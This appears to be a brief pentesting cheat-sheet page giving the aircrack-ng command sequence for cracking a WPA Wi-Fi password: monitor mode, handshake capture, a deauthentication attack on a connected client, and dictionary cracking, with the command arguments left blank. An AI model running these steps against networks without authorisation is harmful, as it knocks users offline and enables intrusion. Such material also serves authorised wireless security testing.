cracking_wpa_attack
CRACKING WPA ATTACK
Cracking WPA Attack
Begin by placing your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to disk:
airodump-ng -c --bssid -w
Deauthenticate a connected client to force it to complete the 4-way handshake:
aireplay-ng -0 1 -a -c
Crack the WPA password with Aircrack-ng:
aircrack-ng -w
Alternatively, if you have and Airolib-ng database, it can be passed to Aircrack:
aircrack-ng -r
Last updated
Was this helpful?